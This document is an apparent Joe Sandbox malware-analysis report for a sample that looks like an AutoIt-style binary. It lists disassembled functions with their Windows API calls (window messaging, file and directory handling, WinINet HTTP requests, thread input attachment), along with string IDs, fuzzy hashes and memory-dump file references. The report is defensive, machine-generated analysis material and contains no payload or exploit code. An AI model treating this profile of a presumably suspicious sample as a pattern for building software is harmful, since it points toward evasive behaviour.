                                                                  • Instruction ID: 0ef84d06a4bee591afa3a6f1346ab48c8918aa358b141ff38e3c70e89b0fed25
                                                                  • Opcode Fuzzy Hash: 70c3b9a062ba7d330aa6bcf248027ca50e68cdb187a51c7b6eee55ceb6a7d0e3
                                                                  • Instruction Fuzzy Hash: 8B4195785047C969FF3166E085043E5BEB26B11344F08835BDDC65A7C2FBA499C4D753
                                                                  Function 006A9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$BuffCharLower
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 707087890-567219261
                                                                  • Opcode ID: 87300f54d1fc7f5902c6cbf5894011b8d0df6f403c2b9472d2f911d548dee94f
                                                                  • Instruction ID: 657e2aa2fd3053796db7590a42634bc5127772e3eddbfe36ddfaabe3a35cfe4d
                                                                  • Opcode Fuzzy Hash: 87300f54d1fc7f5902c6cbf5894011b8d0df6f403c2b9472d2f911d548dee94f
                                                                  • Instruction Fuzzy Hash: A551D431A00516ABCB14EF68C9515FEB7A7BF16360B34462DE826E7380DB35DD41CBA0
                                                                  Function 006A4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoInitialize.OLE32 ref: 006A41D1
                                                                  • CoUninitialize.OLE32 ref: 006A41DC
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,006C0B44,?), ref: 006A4236
                                                                  • IIDFromString.OLE32(?,?), ref: 006A42A9
                                                                  • VariantInit.OLEAUT32(?), ref: 006A4341
                                                                  • VariantClear.OLEAUT32(?), ref: 006A4393
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 636576611-1287834457
                                                                  • Opcode ID: 773504ae99ce7abc2521389f36a86db6dc7582eb6fd56b3b075ae8f7589c2b8f
                                                                  • Instruction ID: 214bb862294768426c0b00d5bbe2f8c857ccfaabb4e557da455e7e554d05ec8e
                                                                  • Opcode Fuzzy Hash: 773504ae99ce7abc2521389f36a86db6dc7582eb6fd56b3b075ae8f7589c2b8f
                                                                  • Instruction Fuzzy Hash: 4861A170608701AFD710EF55C848B6AB7EAEF8A714F00090DF5859B291DBB0EE44CF92
                                                                  Function 00698BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?), ref: 00698C9C
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00698CAC
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00698CB8
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00698D55
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698D69
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698D9B
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00698DD1
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698DDA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                  • String ID: *.*
                                                                  • API String ID: 1464919966-438819550
                                                                  • Opcode ID: efce5fd39c6de556f3da10e80cb4eb838a44162097c12aaac20f5790fd266e79
                                                                  • Instruction ID: 4556ff275fb95b4c8381a16f346fa380de5e4479333e63f6bbdfca17f07d7bd3
                                                                  • Opcode Fuzzy Hash: efce5fd39c6de556f3da10e80cb4eb838a44162097c12aaac20f5790fd266e79
                                                                  • Instruction Fuzzy Hash: 376158B25047159FCB50EF60C8409AEB3EAFF8A310F04492EE98987251EB31E945CF96
                                                                  Function 006B46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateMenu.USER32 ref: 006B4715
                                                                  • SetMenu.USER32(?,00000000), ref: 006B4724
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B47AC
                                                                  • IsMenu.USER32(?), ref: 006B47C0
                                                                  • CreatePopupMenu.USER32 ref: 006B47CA
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B47F7
                                                                  • DrawMenuBar.USER32 ref: 006B47FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                  • String ID: 0$F
                                                                  • API String ID: 161812096-3044882817
                                                                  • Opcode ID: c520859fc1270d89d90dae1c87b627ca9cd1b5f8a228b7da8efde41307dec2a8
                                                                  • Instruction ID: a311eb5e7e51a5440babffa381a20e8bf0b1d16562972e6231d94b4bcbad18d3
                                                                  • Opcode Fuzzy Hash: c520859fc1270d89d90dae1c87b627ca9cd1b5f8a228b7da8efde41307dec2a8
                                                                  • Instruction Fuzzy Hash: 1D4167B9A0120AAFDB24DF64D884EEA7BB6FF09314F144128FA459B391DB70E950CF50
                                                                  Function 0068282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 006828B1
                                                                  • GetDlgCtrlID.USER32 ref: 006828BC
                                                                  • GetParent.USER32 ref: 006828D8
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006828DB
                                                                  • GetDlgCtrlID.USER32(?), ref: 006828E4
                                                                  • GetParent.USER32(?), ref: 006828F8
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006828FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 711023334-1403004172
                                                                  • Opcode ID: 5a7215441c92c7005c3398e20d0b60802cc6d4a96317b05418dc75747754fc4f
                                                                  • Instruction ID: f05881ddf8b00b140612cfa97a1e4731f50adbc5b285f6a921217f4da785f5dc
                                                                  • Opcode Fuzzy Hash: 5a7215441c92c7005c3398e20d0b60802cc6d4a96317b05418dc75747754fc4f
                                                                  • Instruction Fuzzy Hash: D621C2B4900118BBCF04ABA0DC95DEEBBB6EF05350F00425AF951A7291EB755859DF60
                                                                  Function 0068290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00682990
                                                                  • GetDlgCtrlID.USER32 ref: 0068299B
                                                                  • GetParent.USER32 ref: 006829B7
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006829BA
                                                                  • GetDlgCtrlID.USER32(?), ref: 006829C3
                                                                  • GetParent.USER32(?), ref: 006829D7
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 006829DA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 711023334-1403004172
                                                                  • Opcode ID: e48bcf99512eef4740fd1e562ece2ebcc5cc9a1bf48cc339b795354b75ac21c7
                                                                  • Instruction ID: dee84c65d192eac698f9794202c76ec67cae68b370763e3bd93be1214b6507ec
                                                                  • Opcode Fuzzy Hash: e48bcf99512eef4740fd1e562ece2ebcc5cc9a1bf48cc339b795354b75ac21c7
                                                                  • Instruction Fuzzy Hash: 8F21D1B5900218BBCF04BBA0DC95EEEBBBAEF05340F00525AF951A7291EB755849DF60
                                                                  Function 006B44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006B4539
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 006B453C
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B4563
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 006B4586
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 006B45FE
                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 006B4648
                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 006B4663
                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 006B467E
                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 006B4692
                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 006B46AF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 312131281-0
                                                                  • Opcode ID: d780760b5c047afd088d695e72dc9076c9f1f6a92891a8b30b04b1a168123ab1
                                                                  • Instruction ID: b51504d185be423a5c01de984e55ef741955d6df9d572a9a43b90e4c1cad62c7
                                                                  • Opcode Fuzzy Hash: d780760b5c047afd088d695e72dc9076c9f1f6a92891a8b30b04b1a168123ab1
                                                                  • Instruction Fuzzy Hash: 3F614DB5A00219AFDB10DFA8CC81EEE77B9EF09710F104159FA14A73A2DB74A985DB50
                                                                  Function 0068BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0068BB18
                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB2C
                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0068BB33
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB42
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0068BB54
                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB6D
                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BB7F
                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BBC4
                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BBD9
                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0068ABA8,?,00000001), ref: 0068BBE4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                  • String ID:
                                                                  • API String ID: 2156557900-0
                                                                  • Opcode ID: a1c9871d179c79ec1b77b4bdfc95a272f931f776a50f1fdea7186764fb0b147e
                                                                  • Instruction ID: 3827dd4c6d8f3d41649586df603d94bba4f869df04ba962a78711073ad968060
                                                                  • Opcode Fuzzy Hash: a1c9871d179c79ec1b77b4bdfc95a272f931f776a50f1fdea7186764fb0b147e
                                                                  • Instruction Fuzzy Hash: D23173B5504204AFDB10AB14DC84FFE77ABEB44352F106255FA05D72A4EF74A980CB64
                                                                  Function 00622AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00622AF9
                                                                  • OleUninitialize.OLE32(?,00000000), ref: 00622B98
                                                                  • UnregisterHotKey.USER32(?), ref: 00622D7D
                                                                  • DestroyWindow.USER32(?), ref: 00663A1B
                                                                  • FreeLibrary.KERNEL32(?), ref: 00663A80
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00663AAD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: bc1ebe71d37313e7fc2cf4cf0318f6d8bf90f357d13aa2d761697a7b7ebb71da
                                                                  • Instruction ID: 54a34bec0acd9813329829c3170e2592de73e1db2c80db00718414ccb604791f
                                                                  • Opcode Fuzzy Hash: bc1ebe71d37313e7fc2cf4cf0318f6d8bf90f357d13aa2d761697a7b7ebb71da
                                                                  • Instruction Fuzzy Hash: 55D17C717016239FCB68EF54D8A5AA9F7A2BF04710F1142ADE54A6B361CB30AD52CF44
                                                                  Function 00698835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006989F2
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698A06
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00698A30
                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00698A4A
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698A5C
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00698AA5
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00698AF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                  • String ID: *.*
                                                                  • API String ID: 769691225-438819550
                                                                  • Opcode ID: 1d6e6ede6883d984c7b57d8118a48379cdedbb22c78cb1c9baa6ed47242baffe
                                                                  • Instruction ID: f11098a1fdc2539e3eda9ba24507d86f00a16c2b83f6b5e6fb1d0ec9ce811aa2
                                                                  • Opcode Fuzzy Hash: 1d6e6ede6883d984c7b57d8118a48379cdedbb22c78cb1c9baa6ed47242baffe
                                                                  • Instruction Fuzzy Hash: F581AE729043459FCF24EF18C444ABAB3EEBF86310F54482EF889D7651DB35D9458B92
                                                                  Function 006B88F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 006B8992
                                                                  • IsWindowEnabled.USER32(00000000), ref: 006B899E
                                                                  • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 006B8A79
                                                                  • SendMessageW.USER32(00000000,000000B0,?,?), ref: 006B8AAC
                                                                  • IsDlgButtonChecked.USER32(?,00000000), ref: 006B8AE4
                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 006B8B06
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006B8B1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                  • String ID: (o
                                                                  • API String ID: 4072528602-1684096767
                                                                  • Opcode ID: 78128d2a2756e8e04ba2356734567bed2aed9d86791f29e4db8b2f9851ec9abe
                                                                  • Instruction ID: 28800e8a3bac5778d9e86341e4bde0e1d952ac58004a58dd21b150e4db62e446
                                                                  • Opcode Fuzzy Hash: 78128d2a2756e8e04ba2356734567bed2aed9d86791f29e4db8b2f9851ec9abe
                                                                  • Instruction Fuzzy Hash: AA718BB4600205AFDF21AF68C894FFABBBBEF49300F14045AE95567361DB31A9C1CB51
                                                                  Function 00627447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 006274D7
                                                                    • Part of subcall function 00627567: GetClientRect.USER32(?,?), ref: 0062758D
                                                                    • Part of subcall function 00627567: GetWindowRect.USER32(?,?), ref: 006275CE
                                                                    • Part of subcall function 00627567: ScreenToClient.USER32(?,?), ref: 006275F6
                                                                  • GetDC.USER32 ref: 00666083
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00666096
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006660A4
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 006660B9
                                                                  • ReleaseDC.USER32(?,00000000), ref: 006660C1
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00666152
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: d2746c85d603d158a771ce6e0e905372b20d9cd7e2b672bdb7a93dd91fd81839
                                                                  • Instruction ID: 5bf55a25cc2415b55b17b7c2d76cf3b07b972ce10195a3b5e0e1d373b6a13fdb
                                                                  • Opcode Fuzzy Hash: d2746c85d603d158a771ce6e0e905372b20d9cd7e2b672bdb7a93dd91fd81839
                                                                  • Instruction Fuzzy Hash: 8D71DF30500205EFCF219F68E984AFABBB7FF4A320F144269FD555A2A6D7319881DF50
                                                                  Function 0069CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0069CCB7
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0069CCDF
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0069CD0F
                                                                  • GetLastError.KERNEL32 ref: 0069CD67
                                                                  • SetEvent.KERNEL32(?), ref: 0069CD7B
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0069CD86
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 3113390036-3916222277
                                                                  • Opcode ID: a7850d499be5ee356bc88edba01ee094c2a336c22fcba770ee2f8772bfb19ffe
                                                                  • Instruction ID: f1753b678a4e0ea77a28ee87d71d05503707435a80407df9f0b7aad2f98ed7cc
                                                                  • Opcode Fuzzy Hash: a7850d499be5ee356bc88edba01ee094c2a336c22fcba770ee2f8772bfb19ffe
                                                                  • Instruction Fuzzy Hash: AA319FB1500604AFDB21AF64CC88AAB7BFEEF45750B10452EF446D7601EB34DD48DB61
                                                                  Function 0068A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006655AE,?,?,Bad directive syntax error,006BDCD0,00000000,00000010,?,?), ref: 0068A236
                                                                  • LoadStringW.USER32(00000000,?,006655AE,?), ref: 0068A23D
